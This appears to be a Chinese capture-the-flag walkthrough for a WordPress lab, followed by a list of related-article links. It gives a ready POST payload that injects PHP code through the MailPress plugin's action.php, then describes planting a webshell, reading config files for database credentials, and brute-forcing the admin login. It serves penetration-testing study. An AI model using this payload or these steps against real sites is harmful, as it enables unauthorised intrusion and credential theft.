1. 该题使用的是wordpress框架,可以利用WPScan进行扫描

注意:带着token才能扫描出漏洞
WPScan的使用教程可以参考:https://blog.csdn.net/guo15890025019/article/details/118548932
在这里利用mailpress插件的命令执行漏洞,越权执行命令

2. 利用漏洞

http:// IP地址 /wp-content/plugins/mailpress/mp-includes/action.php
利用hackbar或者burp suite进行post的数据传入

参数:
action=autosave&id=0&revision=-1&toemail=&toname=&fromemail=&fromname=&to_list=1&Theme=&subject=<?php phpinfo();?>&html=&plaintext=&mail_format=standard&autosave=1


在这里可以上传一句话木马,用于获取webshell,可以通过查看conf配置文件获取到数据库的用户名和密码,登录数据库

可以通过猜密码,爆破密码,直接修改数据库中密码的方式,登录后台

主机渗透——CRC_3_PENTEST_2_WORDPRESS相关推荐

  1. 【工具-NMAP】主机渗透神器:NMAP (功能介绍,安装,使用,参数完整翻译)-转载

    1 nmap 介绍 Nmap  (网络映射器)是由 Gordon Lyon设计,用来探测计算机网络上的主机和服务的一种 安全扫描器.为了绘制网络拓扑图,Nmap的发送特制的数据包到目标主机,然后对返回 ...

  2. windows powershell实战指南_【安全研究】powershell在主机中是否存在安全隐患?

    近日,安全狗海青实验室在研究powershell攻击运用到主机实战场景时,对powershell在主机中是否存在安全问题进行了一次较为全面的分析,并介绍了powershell从灰色工具逐步演变成为攻击 ...

  3. 修改Linux主机名和IP

    问题描述 又到了例行的系统安全测试时间,公司部署的一套系统需要做安全测试了,首先要做主机渗透,显然不可能在正式环境直接测,于是就把几台服务器做了个镜像,作为测试环境. 现在问题是,测试环境的ip要修改 ...

  4. 利用手机作为渗透工具的一些思路

    前言: 一直有捣鼓手机渗透的想法 手机渗透的好处在我看来就是:便于携带,便于隐藏攻击 毕竟近缘渗透的话 使用电脑的话 太容易暴露了 研究了下最近几年常见的一些app和思路 像以前的zanti和dspl ...

  5. 2023年渗透测试都需要学习哪些内容?

    这个问题,说实话,在2019年之前,其实关注信息安全相关的人并不多,对于市场来讲,信息安全的需求量也不是很大.但大家都知道,在中国,随着时代和技术的发展,信息安全越来越受到重视,一步一步上升到国家战略 ...

  6. 看完这篇 教你玩转渗透测试靶机vulnhub——DC1

    Vulnhub靶机DC1渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:漏洞发现: ③:漏洞利用: ④:S ...

  7. 我猜你也在找内网渗透,这篇难道还不够你嚼烂?

    内网渗透 前言 1.实验简介 网络拓扑图 2.环境搭建 第一层网络 第二层网络 第三层网络 最后 第一台Linux 第二台Linux 3.实验过程 第一层靶机 蚁剑连接 进一步做内网渗透,上传msf后 ...

  8. 一个实验了解多层内网渗透

    原创:锦行安全平台部zy 近年来,攻击者潜伏在企业内网进行攻击的安全事件屡见不鲜,攻击者在经常会企业的内网进行横向渗透,令防守方防不胜防.因此,我们应该严格控制好网络区域之间的访问规则,加大攻击横向渗 ...

  9. 看完这篇 教你玩转渗透测试靶机vulnhub——DC3

    Vulnhub靶机DC3渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:漏洞发现: ③:SQL注入: ④: ...

最新文章

  1. windows程序设计之对话框简介1
  2. python输出命令_Python输出各行命令详解
  3. 2017年度NLP领域论文TOP10(附链接)
  4. 「杂谈」计算机视觉人脸图像的十几个大的应用方向,你懂了几分?
  5. c# winform InvokeRequired 解决跨线程访问控件
  6. 用咨询的角度去实施软件项目
  7. 作者:刘建楠(1963-),男,就职于中国石油庆阳石化公司
  8. .NET连接SAP系统专题:C#如何导入内文至SAP(十一)
  9. ​为什么你应该申请去小型的初创公司实习?
  10. RapidMiner 数据读写
  11. Tensorflow分布式机器学习平台
  12. html转换到pdf转换器,HTML转换到PDF转换器
  13. 微信小程序_map组件实现定位
  14. html5文档样式,jQuery HTML5文件上传美化插件jQuery.filer
  15. uni-app AppStore推广内购、SKPaymentTransactionObser
  16. 网络:简述对5G网络切片的认识
  17. YUV图解 (YUV444, YUV422, YUV420, YV12, NV12, NV21)
  18. c语言的文法,c语言实现First文法
  19. windows下启动redis命令(笔记)
  20. ITFriend创业败局(一):选择创业方向和寻找合伙人,创业失败的2个关键点

热门文章

  1. windows下笔记本共享wifi工具
  2. 产品外观设计应注意哪些因素?
  3. ORB-SLAM 2 整理
  4. linux中grep命令返回值,linux命令--grep命令
  5. PMP知识点总结-七大激励理论
  6. 莫言被央视追问“你幸福吗” 回答:我不知道-你幸福吗-我不知道-莫言
  7. 【LabVIEW懒人系列教程-视觉入门】2.3LabVIEW之Vision视觉助手案例
  8. MATLAB基于视频的人体姿态检测
  9. python150个常用单词_UC头条:python常用150个英文单词
  10. HTML中如何调整标签在页面中显示的位置